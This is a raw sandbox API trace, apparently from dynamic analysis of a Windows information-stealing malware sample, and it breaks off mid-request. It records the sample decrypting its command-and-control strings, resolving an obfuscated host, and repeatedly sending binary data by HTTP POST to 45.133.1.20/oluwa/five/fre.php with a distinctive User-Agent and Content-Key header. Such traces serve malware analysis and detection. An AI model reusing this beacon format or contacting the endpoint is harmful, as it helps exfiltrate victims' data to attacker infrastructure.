[0255.539] GetProcessHeap () returned 0x6a0000 [0255.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0255.540] GetProcessHeap () returned 0x6a0000 [0255.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0255.540] GetProcessHeap () returned 0x6a0000 [0255.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0255.541] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.543] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.543] GetProcessHeap () returned 0x6a0000 [0255.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0255.543] GetProcessHeap () returned 0x6a0000 [0255.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0255.543] send (s=0x890, buf=0x6bd460*, len=242, flags=0) returned 242 [0255.544] send (s=0x890, buf=0x6bb998*, len=159, flags=0) returned 159 [0255.544] GetProcessHeap () returned 0x6a0000 [0255.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0255.544] recv (in: s=0x890, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0255.610] GetProcessHeap () returned 0x6a0000 [0255.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0255.611] GetProcessHeap () returned 0x6a0000 [0255.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0255.612] GetProcessHeap () returned 0x6a0000 [0255.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db648 | out: hHeap=0x6a0000) returned 1 [0255.613] GetProcessHeap () returned 0x6a0000 [0255.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0255.614] closesocket (s=0x890) returned 0 [0255.615] GetProcessHeap () returned 0x6a0000 [0255.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0255.615] GetProcessHeap () returned 0x6a0000 [0255.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.616] GetProcessHeap () returned 0x6a0000 [0255.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0255.617] GetProcessHeap () returned 0x6a0000 [0255.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0255.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15c0) returned 0x890 [0255.621] Sleep (dwMilliseconds=0xea60) [0255.622] GetProcessHeap () returned 0x6a0000 [0255.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0255.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.634] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0255.646] GetProcessHeap () returned 0x6a0000 [0255.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0255.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.647] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0255.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.649] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.651] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.651] GetProcessHeap () returned 0x6a0000 [0255.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0255.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.653] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0255.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.654] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0255.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.661] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0255.661] GetProcessHeap () returned 0x6a0000 [0255.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.665] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.667] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.668] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.669] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.669] GetProcessHeap () returned 0x6a0000 [0255.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0255.669] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.670] GetProcessHeap () returned 0x6a0000 [0255.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0255.670] GetProcessHeap () returned 0x6a0000 [0255.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.671] GetProcessHeap () returned 0x6a0000 [0255.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0255.671] GetProcessHeap () returned 0x6a0000 [0255.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0255.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.672] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.682] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0255.694] GetProcessHeap () returned 0x6a0000 [0255.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0255.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.695] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0255.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.697] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.698] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.698] GetProcessHeap () returned 0x6a0000 [0255.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0255.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.700] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0255.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.701] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0255.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.703] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0255.703] GetProcessHeap () returned 0x6a0000 [0255.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.704] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0255.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.706] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0255.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.709] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0255.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.711] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0255.711] GetProcessHeap () returned 0x6a0000 [0255.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0255.711] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0255.711] GetProcessHeap () returned 0x6a0000 [0255.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0255.711] socket (af=2, type=1, protocol=6) returned 0x894 [0255.712] connect (s=0x894, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0255.743] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0255.743] GetProcessHeap () returned 0x6a0000 [0255.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0255.743] GetProcessHeap () returned 0x6a0000 [0255.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0255.744] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.745] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.745] GetProcessHeap () returned 0x6a0000 [0255.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dad48 [0255.745] GetProcessHeap () returned 0x6a0000 [0255.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0255.746] GetProcessHeap () returned 0x6a0000 [0255.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0255.746] GetProcessHeap () returned 0x6a0000 [0255.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0255.747] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.747] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.747] GetProcessHeap () returned 0x6a0000 [0255.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0255.748] GetProcessHeap () returned 0x6a0000 [0255.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0255.748] send (s=0x894, buf=0x6bd460*, len=242, flags=0) returned 242 [0255.749] send (s=0x894, buf=0x6bb998*, len=159, flags=0) returned 159 [0255.749] GetProcessHeap () returned 0x6a0000 [0255.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0255.749] recv (in: s=0x894, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0255.833] GetProcessHeap () returned 0x6a0000 [0255.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0255.833] GetProcessHeap () returned 0x6a0000 [0255.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0255.834] GetProcessHeap () returned 0x6a0000 [0255.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dad48 | out: hHeap=0x6a0000) returned 1 [0255.834] GetProcessHeap () returned 0x6a0000 [0255.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0255.834] closesocket (s=0x894) returned 0 [0255.835] GetProcessHeap () returned 0x6a0000 [0255.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0255.835] GetProcessHeap () returned 0x6a0000 [0255.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.836] GetProcessHeap () returned 0x6a0000 [0255.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0255.836] GetProcessHeap () returned 0x6a0000 [0255.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0255.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15c4) returned 0x894 [0255.840] Sleep (dwMilliseconds=0xea60) [0255.842] GetProcessHeap () returned 0x6a0000 [0255.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0255.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.843] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.852] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0255.860] GetProcessHeap () returned 0x6a0000 [0255.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0255.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.862] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0255.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.863] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.864] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.864] GetProcessHeap () returned 0x6a0000 [0255.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0255.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.866] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0255.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.868] CryptDestroyKey (hKey=0x6ad020) returned 1 [0255.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.869] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0255.869] GetProcessHeap () returned 0x6a0000 [0255.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.870] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.880] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.881] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.882] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.882] GetProcessHeap () returned 0x6a0000 [0255.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0255.882] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.882] GetProcessHeap () returned 0x6a0000 [0255.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0255.887] GetProcessHeap () returned 0x6a0000 [0255.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.887] GetProcessHeap () returned 0x6a0000 [0255.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0255.888] GetProcessHeap () returned 0x6a0000 [0255.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0255.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.889] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.898] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0255.906] GetProcessHeap () returned 0x6a0000 [0255.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0255.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.908] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0255.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.909] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.910] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.911] GetProcessHeap () returned 0x6a0000 [0255.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0255.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.912] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0255.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.913] CryptDestroyKey (hKey=0x6ad020) returned 1 [0255.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.915] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0255.915] GetProcessHeap () returned 0x6a0000 [0255.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.919] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0255.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.920] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0255.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.921] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0255.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.923] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0255.923] GetProcessHeap () returned 0x6a0000 [0255.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0255.923] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0255.923] GetProcessHeap () returned 0x6a0000 [0255.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0255.923] socket (af=2, type=1, protocol=6) returned 0x898 [0255.923] connect (s=0x898, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0255.948] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0255.948] GetProcessHeap () returned 0x6a0000 [0255.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0255.948] GetProcessHeap () returned 0x6a0000 [0255.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0255.950] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.951] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.951] GetProcessHeap () returned 0x6a0000 [0255.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da8c8 [0255.951] GetProcessHeap () returned 0x6a0000 [0255.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0255.952] GetProcessHeap () returned 0x6a0000 [0255.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0255.952] GetProcessHeap () returned 0x6a0000 [0255.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0255.953] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.954] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 